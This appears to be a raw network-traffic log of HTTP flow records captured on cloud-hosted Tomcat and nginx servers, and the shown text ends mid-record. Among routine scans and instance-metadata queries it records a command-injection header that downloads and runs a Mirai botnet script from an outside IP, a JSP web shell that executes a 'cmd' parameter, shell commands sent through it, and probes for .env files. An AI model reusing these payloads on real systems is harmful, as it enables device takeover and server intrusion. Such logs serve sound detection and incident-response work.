{"endtime":"2022-04-06T14:42:25.697856Z","timestamp":"2022-04-06T14:42:25.697856Z","bytes":30,"bytes_in":30,"bytes_out":0,"dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":80,"flow_id":"1dc7af32-1a09-42aa-8fee-5c4cf9068ca9","http_method":"GET","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"ddos","src_headers":"GET / HTTP/1.1\r\nHost: ddos\r\n\r\n","src_ip":"45.148.10.81","src_mac":"02:A5:92:DA:49:85","src_port":19023,"time_taken":0,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T14:42:20.512787Z","timestamp":"2022-04-06T14:42:20.512787Z","bytes":30,"bytes_in":30,"bytes_out":0,"dest_ip":"10.0.1.12","dest_mac":"02:3E:49:33:B8:B5","dest_port":80,"flow_id":"14b464f7-9e40-41ad-befa-281cf6c9bffb","http_method":"GET","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"ddos","src_headers":"GET / HTTP/1.1\r\nHost: ddos\r\n\r\n","src_ip":"45.148.10.81","src_mac":"02:A5:92:DA:49:85","src_port":2811,"time_taken":0,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T14:31:33.139709Z","timestamp":"2022-04-06T14:31:33.139709Z","bytes":231,"bytes_in":231,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"df875deb-5e4a-41e1-a8fc-62770b3aa901","http_method":"GET","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36","protocol_stack":"ip:tcp:http","request":"GET /.env HTTP/1.1","site":"35.84.123.246","src_headers":"GET /.env HTTP/1.1\r\nHost: 35.84.123.246\r\nUser-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\n\r\n","src_ip":"185.254.196.115","src_mac":"02:A5:92:DA:49:85","src_port":53860,"time_taken":168290,"transport":"tcp","uri":"/.env","uri_path":"/.env"} {"endtime":"2022-04-06T14:28:34.991251Z","timestamp":"2022-04-06T14:28:34.991251Z","bytes":30,"bytes_in":30,"bytes_out":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"11977320-3d5c-447c-af35-1df10460659c","http_method":"GET","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"ddos","src_headers":"GET / HTTP/1.1\r\nHost: ddos\r\n\r\n","src_ip":"45.148.10.81","src_mac":"02:A5:92:DA:49:85","src_port":18107,"time_taken":0,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T14:20:09.987952Z","timestamp":"2022-04-06T14:20:09.987952Z","bytes":191,"bytes_in":191,"bytes_out":0,"cs_content_length":0,"dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"flow_id":"10ba6367-f1a9-4a3c-8df3-e4557e65bb6c","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"35.84.123.246:80","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246:80\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7\r\nContent-Length: 0\r\n\r\n","src_ip":"14.102.17.227","src_mac":"02:A5:92:DA:49:85","src_port":55776,"time_taken":280057,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T14:12:07.923881Z","timestamp":"2022-04-06T14:12:07.922645Z","bytes":1487,"bytes_in":237,"bytes_out":1250,"dest_content":"HTTP Status 404 – Not Found

HTTP Status 404 – Not Found


Type Status Report

Message /favicon.ico

Description The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 404 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 1094\r\nDate: Wed, 06 Apr 2022 14:12:07 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1094,"flow_id":"624396ab-2e04-4381-a6c1-d704c545e8fb","http_comment":"HTTP/1.1 404 ","http_content_length":1094,"http_content_type":"text/html;charset=utf-8","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /favicon.ico HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET /favicon.ico HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"185.220.101.57","src_mac":"02:A5:92:DA:49:85","src_port":19690,"status":404,"time_taken":192231,"transport":"tcp","uri":"/favicon.ico","uri_path":"/favicon.ico"} {"endtime":"2022-04-06T14:12:06.147138Z","timestamp":"2022-04-06T14:12:06.145997Z","bytes":2339,"bytes_in":226,"bytes_out":2113,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 14:12:06 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"1a4579d7-8480-4ecf-af84-7951688a1a55","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET / HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"185.220.101.52","src_mac":"02:A5:92:DA:49:85","src_port":11694,"status":200,"time_taken":183824,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T14:11:43.602581Z","timestamp":"2022-04-06T14:11:43.602581Z","bytes":44,"bytes_in":44,"bytes_out":0,"dest_ip":"10.0.1.12","dest_mac":"02:3E:49:33:B8:B5","dest_port":8089,"flow_id":"d3c3c925-f80a-4eaf-bea8-b0a591316e49","http_method":"GET","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","site":"54.189.97.219:8089","src_headers":"GET / HTTP/1.1\r\nHost: 54.189.97.219:8089\r\n\r\n","src_ip":"167.94.138.60","src_mac":"02:A5:92:DA:49:85","src_port":49174,"time_taken":81421,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T14:11:42.457884Z","timestamp":"2022-04-06T14:11:42.456683Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 14:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"f5e0c0a1-70b9-4263-b14f-b10873bd6b34","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rloMtAuWJAl8x8Rj_euHzV1DshFLTPF3NylS3DiUUO0SLg==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":47166,"status":404,"time_taken":1209,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T14:11:42.456279Z","timestamp":"2022-04-06T14:11:42.455680Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 7200\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 13:22:50 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 14:11:42 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"d3a05b10-9a29-47b7-b00f-5275c14587bc","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEANi0rlpISY2KKWq4mdAIyZ2OUwoXcHsMFj0Jl1Jpcr8sQ60VEw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.21","src_mac":"02:8E:79:92:C3:CD","src_port":47164,"status":200,"time_taken":616,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T14:10:12.252331Z","timestamp":"2022-04-06T14:10:12.250858Z","bytes":2204,"bytes_in":110,"bytes_out":2094,"dest_content":"\n\n\n\n Apache Tomcat\n\n\n\n

It works !

\n\n

If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!

\n \n

This is the default Tomcat home page. It can be found on the local filesystem at: /var/lib/tomcat9/webapps/ROOT/index.html

\n\n

Tomcat veterans might be pleased to learn that this system instance of Tomcat is installed with CATALINA_HOME in /usr/share/tomcat9 and CATALINA_BASE in /var/lib/tomcat9, following the rules from /usr/share/doc/tomcat9-common/RUNNING.txt.gz.

\n\n

You might consider installing the following packages, if you haven't already done so:

\n\n

tomcat9-docs: This package installs a web application that allows to browse the Tomcat 9 documentation locally. Once installed, you can access it by clicking here.

\n\n

tomcat9-examples: This package installs a web application that allows to access the Tomcat 9 Servlet and JSP examples. Once installed, you can access it by clicking here.

\n\n

tomcat9-admin: This package installs two web applications that can help managing this Tomcat instance. Once installed, you can access the manager webapp and the host-manager webapp.

\n\n

NOTE: For security reasons, using the manager webapp is restricted to users with role \"manager-gui\". The host-manager webapp is restricted to users with role \"admin-gui\". Users are defined in /etc/tomcat9/tomcat-users.xml.

\n\n\n\n","dest_headers":"HTTP/1.1 200 \r\nAccept-Ranges: bytes\r\nETag: W/\"1895-1649171235548\"\r\nLast-Modified: Tue, 05 Apr 2022 15:07:15 GMT\r\nContent-Type: text/html\r\nContent-Length: 1895\r\nDate: Wed, 06 Apr 2022 14:10:12 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":1895,"flow_id":"7612e0a0-1ee5-42f3-8d19-1c6ae30934d1","http_comment":"HTTP/1.1 200 ","http_content_length":1895,"http_content_type":"text/html","http_method":"GET","http_user_agent":"Go-http-client/1.1","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET http://example.com/ HTTP/1.1","site":"example.com","src_headers":"GET http://example.com/ HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Go-http-client/1.1\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"45.137.21.208","src_mac":"02:A5:92:DA:49:85","src_port":52518,"status":200,"time_taken":167306,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T14:03:47.464799Z","timestamp":"2022-04-06T14:03:47.387590Z","bytes":3904,"bytes_in":511,"bytes_out":3393,"cookie":"JSESSIONID=9C247D1456CE80075F8F53947591D119","dest_content":"HTTP Status 500 – Internal Server Error

HTTP Status 500 – Internal Server Error


Type Exception Report

Message Unable to compile class for JSP:

Description The server encountered an unexpected condition that prevented it from fulfilling the request.

Exception

org.apache.jasper.JasperException: Unable to compile class for JSP: \n\nAn error occurred at line: [45] in the jsp file: [/shell.jsp]\nDuplicate local variable in\n42: \n43: \n44: \n45: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %>//\n46: \n47: \n\n\nAn error occurred at line: [45] in the jsp file: [/shell.jsp]\nDuplicate local variable a\n42: \n43: \n44: \n45: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %>//\n46: \n47: \n\n\nAn error occurred at line: [45] in the jsp file: [/shell.jsp]\nDuplicate local variable b\n42: \n43: \n44: \n45: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } %>//\n46: \n47: \n\n\nStacktrace:\n\torg.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:103)\n\torg.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:213)\n\torg.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:473)\n\torg.apache.jasper.compiler.Compiler.compile(Compiler.java:392)\n\torg.apache.jasper.compiler.Compiler.compile(Compiler.java:362)\n\torg.apache.jasper.compiler.Compiler.compile(Compiler.java:346)\n\torg.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:603)\n\torg.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:399)\n\torg.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:385)\n\torg.apache.jasper.servlet.JspServlet.service(JspServlet.java:329)\n\tjavax.servlet.http.HttpServlet.service(HttpServlet.java:741)\n\torg.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\n

Note The full stack trace of the root cause is available in the server logs.


Apache Tomcat/9.0.16 (Ubuntu)

","dest_headers":"HTTP/1.1 500 \r\nContent-Type: text/html;charset=utf-8\r\nContent-Language: en\r\nContent-Length: 3237\r\nDate: Wed, 06 Apr 2022 14:03:47 GMT\r\nConnection: close\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":3237,"flow_id":"2c226dbc-5d59-46a5-936c-eeff3ee394f7","form_data":"cmd=id","http_comment":"HTTP/1.1 500 ","http_content_length":3237,"http_content_type":"text/html;charset=utf-8","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /shell.jsp?cmd=id HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET /shell.jsp?cmd=id HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nCookie: JSESSIONID=9C247D1456CE80075F8F53947591D119\r\n\r\n","src_ip":"75.174.190.242","src_mac":"02:A5:92:DA:49:85","src_port":59176,"status":500,"time_taken":96148,"transport":"tcp","uri":"/shell.jsp?cmd=id","uri_path":"/shell.jsp","uri_query":"cmd=id"} {"endtime":"2022-04-06T14:02:06.088432Z","timestamp":"2022-04-06T14:02:06.088242Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 14:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"69392408-147e-4d8c-81f7-4cb90e6851ab","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSLZfJzGNUbrTUti8Zb5YD247x8VWDVEKvfIraEJi4klLw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":50426,"status":404,"time_taken":198,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T14:02:06.087820Z","timestamp":"2022-04-06T14:02:06.087565Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 13:05:08 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 14:02:06 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"f81a341e-8e5b-482c-9934-64566f62870b","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAN81uSKZ6fg3H_1GamlMDi7Jt2PNf64_KawmSZpeVPosNbaOJA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.12","src_mac":"02:3E:49:33:B8:B5","src_port":50424,"status":200,"time_taken":278,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T14:01:59.879430Z","timestamp":"2022-04-06T14:01:59.879167Z","bytes":772,"bytes_in":246,"bytes_out":526,"dest_content":"\n\n\n \n 404 - Not Found\n \n \n

404 - Not Found

\n \n\n","dest_headers":"HTTP/1.1 404 Not Found\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/html\r\nContent-Length: 339\r\nDate: Wed, 06 Apr 2022 14:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":339,"flow_id":"d3feec39-e5f2-48d8-98a3-3e683fec5774","http_comment":"HTTP/1.1 404 Not Found","http_content_length":339,"http_content_type":"text/html","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/iam/security-credentials/ HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncwbAd8hTtV4ikA0C_u2Uw73ddUQYOJwA77j_1jPbtBDnA==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":54220,"status":404,"time_taken":282,"transport":"tcp","uri":"/latest/meta-data/iam/security-credentials/","uri_path":"/latest/meta-data/iam/security-credentials/"} {"endtime":"2022-04-06T14:01:59.877502Z","timestamp":"2022-04-06T14:01:59.877110Z","bytes":496,"bytes_in":236,"bytes_out":260,"dest_content":"amazonaws.com","dest_headers":"HTTP/1.1 200 OK\r\nX-Aws-Ec2-Metadata-Token-Ttl-Seconds: 3600\r\nContent-Type: text/plain\r\nAccept-Ranges: none\r\nLast-Modified: Wed, 06 Apr 2022 13:46:58 GMT\r\nContent-Length: 13\r\nDate: Wed, 06 Apr 2022 14:01:59 GMT\r\nServer: EC2ws\r\nConnection: close\r\n\r\n","dest_ip":"169.254.169.254","dest_mac":"02:A5:92:DA:49:85","dest_port":80,"file_size":13,"flow_id":"0c0773f0-1292-47cc-a399-b055d0a8a40f","http_comment":"HTTP/1.1 200 OK","http_content_length":13,"http_content_type":"text/plain","http_method":"GET","http_user_agent":"aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)","mime_type":"text/plain","protocol_stack":"ip:tcp:http","request":"GET /latest/meta-data/services/domain HTTP/1.1","server":"EC2ws","site":"169.254.169.254","src_headers":"GET /latest/meta-data/services/domain HTTP/1.1\r\nHost: 169.254.169.254\r\nUser-Agent: aws-sdk-go/1.41.4 (go1.16.8; linux; amd64)\r\nX-Aws-Ec2-Metadata-Token: AQAEAJg5ncw46gaJ13Iw95CL8G0HE0gZENKG-L55q-LhIEppH1CBWw==\r\nAccept-Encoding: gzip\r\n\r\n","src_ip":"10.0.1.20","src_mac":"02:9E:53:65:4C:5F","src_port":54218,"status":200,"time_taken":439,"transport":"tcp","uri":"/latest/meta-data/services/domain","uri_path":"/latest/meta-data/services/domain"} {"endtime":"2022-04-06T13:50:07.892555Z","timestamp":"2022-04-06T13:49:07.833931Z","bytes":1053,"bytes_in":372,"bytes_out":681,"cs_content_length":0,"dest_content":"\n\n\nError\n\n\n\n

An error occurred.

\n

Sorry, the page you are looking for is currently unavailable.
\nPlease try again later.

\n

If you are the system administrator of this resource then you should check\nthe error log for details.

\n

Faithfully yours, nginx.

\n\n\n","dest_headers":"HTTP/1.1 504 Gateway Time-out\r\nServer: nginx/1.21.5\r\nDate: Wed, 06 Apr 2022 13:50:07 GMT\r\nContent-Type: text/html\r\nContent-Length: 497\r\nConnection: keep-alive\r\nETag: \"61cb4edc-1f1\"\r\n\r\n","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":497,"flow_id":"adee8ca7-267d-4ebd-9843-996e5ba272ca","http_comment":"HTTP/1.1 504 Gateway Time-out","http_content_length":497,"http_content_type":"text/html","http_method":"POST","http_user_agent":"Mozila/5.0","mime_type":"text/html","protocol_stack":"ip:tcp:http:soap","request":"POST /HNAP1/ HTTP/1.1","server":"nginx/1.21.5","site":"35.84.123.246:80","src_headers":"POST /HNAP1/ HTTP/1.1\r\nHost: 35.84.123.246:80\r\nUser-Agent: Mozila/5.0\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nSOAPAction: \"http://purenetworks.com/HNAP1/GetDeviceSettings/`cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://194.242.56.116/a/mirai.sh;chmod 777 mirai.sh;sh mirai.sh selfrep.dlink;rm -rf mirai.sh`\"\r\nContent-Length: 0\r\n\r\n","src_ip":"194.242.56.116","src_mac":"02:A5:92:DA:49:85","src_port":52414,"status":504,"time_taken":60229043,"transport":"tcp","uri":"/HNAP1/","uri_path":"/HNAP1/"} {"endtime":"2022-04-06T13:49:07.500298Z","timestamp":"2022-04-06T13:48:07.439649Z","bytes":723,"bytes_in":42,"bytes_out":681,"dest_content":"\n\n\nError\n\n\n\n

An error occurred.

\n

Sorry, the page you are looking for is currently unavailable.
\nPlease try again later.

\n

If you are the system administrator of this resource then you should check\nthe error log for details.

\n

Faithfully yours, nginx.

\n\n\n","dest_headers":"HTTP/1.1 504 Gateway Time-out\r\nServer: nginx/1.21.5\r\nDate: Wed, 06 Apr 2022 13:49:07 GMT\r\nContent-Type: text/html\r\nContent-Length: 497\r\nConnection: keep-alive\r\nETag: \"61cb4edc-1f1\"\r\n\r\n","dest_ip":"10.0.1.21","dest_mac":"02:8E:79:92:C3:CD","dest_port":80,"file_size":497,"flow_id":"6dcf28eb-2afa-4e72-8f72-625e25bce2f1","http_comment":"HTTP/1.1 504 Gateway Time-out","http_content_length":497,"http_content_type":"text/html","http_method":"GET","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET / HTTP/1.1","server":"nginx/1.21.5","site":"35.84.123.246:80","src_headers":"GET / HTTP/1.1\r\nHost: 35.84.123.246:80\r\n\r\n","src_ip":"194.242.56.116","src_mac":"02:A5:92:DA:49:85","src_port":54882,"status":504,"time_taken":60060649,"transport":"tcp","uri":"/","uri_path":"/"} {"endtime":"2022-04-06T13:41:14.892510Z","timestamp":"2022-04-06T13:41:14.826182Z","bytes":2748,"bytes_in":458,"bytes_out":2290,"dest_content":"uid=999(tomcat) gid=999(tomcat) groups=999(tomcat)\n","dest_headers":"HTTP/1.1 200 \r\nSet-Cookie: JSESSIONID=9C247D1456CE80075F8F53947591D119; Path=/; HttpOnly\r\nContent-Type: text/html;charset=ISO-8859-1\r\nContent-Length: 2095\r\nDate: Wed, 06 Apr 2022 13:41:14 GMT\r\n\r\n","dest_ip":"10.0.1.20","dest_mac":"02:9E:53:65:4C:5F","dest_port":8080,"file_size":2095,"flow_id":"96783497-1d24-4200-8dc1-ab5293c78414","form_data":"cmd=id","http_comment":"HTTP/1.1 200 ","http_content_length":2095,"http_content_type":"text/html;charset=ISO-8859-1","http_method":"GET","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36","mime_type":"text/html","protocol_stack":"ip:tcp:http","request":"GET /shell.jsp?cmd=id HTTP/1.1","site":"54.218.192.0:8080","src_headers":"GET /shell.jsp?cmd=id HTTP/1.1\r\nHost: 54.218.192.0:8080\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36\r\nAccept: 